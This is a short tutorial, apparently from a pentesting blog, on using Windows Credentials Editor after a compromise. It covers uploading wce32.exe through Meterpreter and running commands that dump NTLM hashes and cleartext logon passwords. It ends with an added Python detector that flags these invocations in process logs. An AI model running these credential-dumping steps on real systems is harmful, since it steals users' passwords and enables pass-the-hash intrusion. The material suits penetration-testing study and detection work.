Post Exploitation With Windows Credentials Editor (WCE)

What is WCE?

A tool that allows you to harvest hashes from Windows.

 

Functionality

WCE can be used for a variety of functions:

  • It can perform pass-the-hash on Windows.
  • It can obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.).
  • It can dump cleartext passwords entered by users at login.

WCE is a security tool widely used by security professionals to assess the security of Windows networks through penetration testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8.

It comes prepackaged with Kali.

Directory

/usr/share/wce/

 

How it is used

  • As mentioned earlier, it is used in penetration tests and in CTFs that involve Windows targets.
  • It works extremely well in post-exploitation when harvesting credentials.
  • All you need to do is upload the wce.exe executable to the target system and run it.

 

Demonstration

Target OS: Windows 7 VM

We have already exploited the target and spawned a Meterpreter reverse shell. We can now begin our credential harvesting.

  • We can use the Meterpreter upload functionality to upload the wce32.exe executable to our target system. Ideally, we want it in the system32 folder with admin privileges.

 

upload /usr/share/wce32.exe

Depending on the target system architecture, you can specify the appropriate WCE executable (32-bit or 64-bit).

 

Using WCE

  • Viewing the help menu

wce32.exe -h

  • To list all the hashes of all users

wce32.exe

  • Retrieving user passwords in cleartext

wce32.exe -w

Note: WCE will only display active user credentials and hashes.

  • Retrieving the NTLM hash of a given password

wce32.exe -g <password>
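For the defending side, the invocations above leave a recognisable trail in process-creation logs. The following is an added example, not part of the original post: it classifies constructed Sysmon Event ID 1 style records by the switches shown above and redacts the password that -g places on the command line. The wce64.exe name, the host and user values, and the record layout are assumptions made for illustration.

```python
import ntpath
import shlex

# Binary names used on the page; wce64.exe is assumed for the 64-bit build.
WCE_NAMES = {"wce.exe", "wce32.exe", "wce64.exe"}
# Switches shown on the page and what each one does.
ACTIONS = {"-h": "help menu", "-w": "cleartext password dump",
           "-g": "hash generation for a supplied password"}

# Constructed process-creation records (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"Computer": "WIN7-VM", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\wce32.exe", "CommandLine": "wce32.exe -w"},
    {"Computer": "WIN7-VM", "User": "WIN7-VM\\bob",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"Computer": "WIN7-VM", "User": "WIN7-VM\\bob",
     "Image": r"C:\Users\bob\Downloads\wce64.exe",
     "CommandLine": r'"C:\Users\bob\Downloads\wce64.exe"'},
    {"Computer": "WIN7-VM", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Windows\System32\Wce32.exe",
     "CommandLine": "Wce32.exe -g Summer2024!"},
]

def classify(event):
    """Return a finding for a WCE process-creation event, else None."""
    image = ntpath.basename(event["Image"]).lower()
    if image not in WCE_NAMES:
        return None
    try:
        args = shlex.split(event["CommandLine"], posix=False)[1:]
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        args = event["CommandLine"].split()[1:]
    switch = next((a for a in args if a in ACTIONS), None)
    if switch:
        action = ACTIONS[switch]
    else:
        action = "hash listing" if not args else "unrecognised arguments"
    # -g puts a plaintext password on the command line; keep it out of alerts.
    shown = ["<redacted>" if i and args[i - 1] == "-g" else a
             for i, a in enumerate(args)]
    return {"computer": event["Computer"], "user": event["User"],
            "image": image, "action": action, "args": shown,
            "reads_credentials": switch == "-w" or not args,
            "in_system32": "\\system32\\" in event["Image"].lower()}

def scan(events):
    """Classify every event and keep only the WCE findings."""
    return [f for f in map(classify, events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Matching is by file name and switch only, so this serves as a baseline check over process-creation telemetry.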

 
